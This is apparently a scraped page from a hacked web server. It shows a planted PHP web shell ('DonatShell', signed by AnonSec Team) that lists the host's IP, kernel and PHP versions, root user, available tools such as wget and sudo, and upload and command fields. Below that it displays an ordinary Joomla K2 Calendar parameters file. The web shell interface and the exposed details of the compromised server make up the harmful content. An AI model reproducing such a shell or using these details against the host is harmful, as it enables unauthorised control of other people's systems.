%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 49.231.201.246  /  Your IP : 216.73.216.248
Web Server : Apache/2.4.18 (Ubuntu)
System : Linux 246 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
User : root ( 0)
PHP Version : 7.0.33-0ubuntu0.16.04.16
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/old/modules/mod_b2j_k2_calendar/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /var/www/html/old/modules/mod_b2j_k2_calendar/helper_parameters.php
<?php

/* ------------------------------------------------------------------------
 * Bang2Joom K2 Calendar for Joomla 2.5+
 * ------------------------------------------------------------------------
 * Copyright (C) 2011-2012 Bang2Joom. All Rights Reserved.
 * @license - GNU/GPL, http://www.gnu.org/licenses/gpl.html
 * Author: Bang2Joom
 * Websites: http://www.bang2joom.com
  ------------------------------------------------------------------------
 */

defined('_JEXEC') or die('Restricted access');

//when including make sure that $params is accessible

$msfx = $params->get("moduleclass_sfx");
$module_width = $params->get("module_width", 500);

$calendar_mode = $params->get("calendar_mode", 1);
$k2_filter = $params->get("k2_filter", 1);
$k2_categories = $params->get("k2_categories");
$k2_category = $params->get("k2_category");
$inherit_children = $params->get("inherit_children", 1);
$date_type = $params->get("date_type", 'publish_up');
$maximum_items = $params->get("maximum_items", 20);
$starting_weekday = $params->get("starting_weekday", 1);
$only_active_days = $params->get("only_active_days", 0);
$future_days = $params->get("future_days", 1);
$show_counts = $params->get("show_counts", 1);

$border_size = $params->get("border_size", 1);
$font_size = $params->get("font_size", 18);
$border_color = $params->get("border_color", "#959595");

$date_view_pos = $params->get("date_view_pos", 1);
$title_view_pos = $params->get("title_view_pos", 2);
$introtext_view_pos = $params->get("introtext_view_pos", 3);

$date_view_float = $params->get("date_view_float", "left");
$title_view_float = $params->get("title_view_float", "left");
$introtext_view_float = $params->get("introtext_view_float", "left");

$date_view = $params->get("date_view", 1);
$title_view = $params->get("title_view", 1);
$introtext_view = $params->get("introtext_view", 1);

$title_font_size = $params->get("title_font_size", 14);
$title_font_color = $params->get("title_font_color", "#666666");
$title_limit = $params->get("title_limit");
$title_limit_by = $params->get("title_limit_by", 0);
$title_end = $params->get("title_end", 0);

$date_font_size = $params->get("date_font_size", 14);
$date_font_color = $params->get("date_font_color", "#666666");
$date_format = $params->get("date_format", "M jS Y H:i");

$introtext_font_size = $params->get("introtext_font_size", 12);
$introtext_font_color = $params->get("introtext_font_color", "#666666");
$introtext_limit = $params->get("introtext_limit");
$introtext_limit_by = $params->get("introtext_limit_by", 0);
$introtext_end = $params->get("introtext_end", 0);

$color_presets = $params->get("color_presets", 1);

$button_color = $params->get("button_color", "#FAFAFA");
$month_year_color = $params->get("month_year_color", "#FAFAFA");
$weekdays_color = $params->get("weekdays_color", "#2F343B");
$active_days_color = $params->get("active_days_color", "#FAFAFA");
$passive_days_color = $params->get("passive_days_color", "#D7D7D7");
$out_of_month_days = $params->get("out_of_month_days", "#D7D7D7");
$today_color = $params->get("today_color", "#2F343B");
$selected_day = $params->get("selected_day", "#666666");

$month_year_color_text = $params->get("month_year_color_text", "#2F343B");
$weekdays_color_text = $params->get("weekdays_color_text", "#ffffff");
$active_days_color_text = $params->get("active_days_color_text", "#2F343B");
$passive_days_color_text = $params->get("passive_days_color_text", "#ACACAC");
$out_of_month_days_text = $params->get("out_of_month_days_text", "#ACACAC");
$today_color_text = $params->get("today_color_text", "#ffffff");
$selected_day_text = $params->get("selected_day_text", "#ffffff");

?>

Anon7 - 2022
AnonSec Team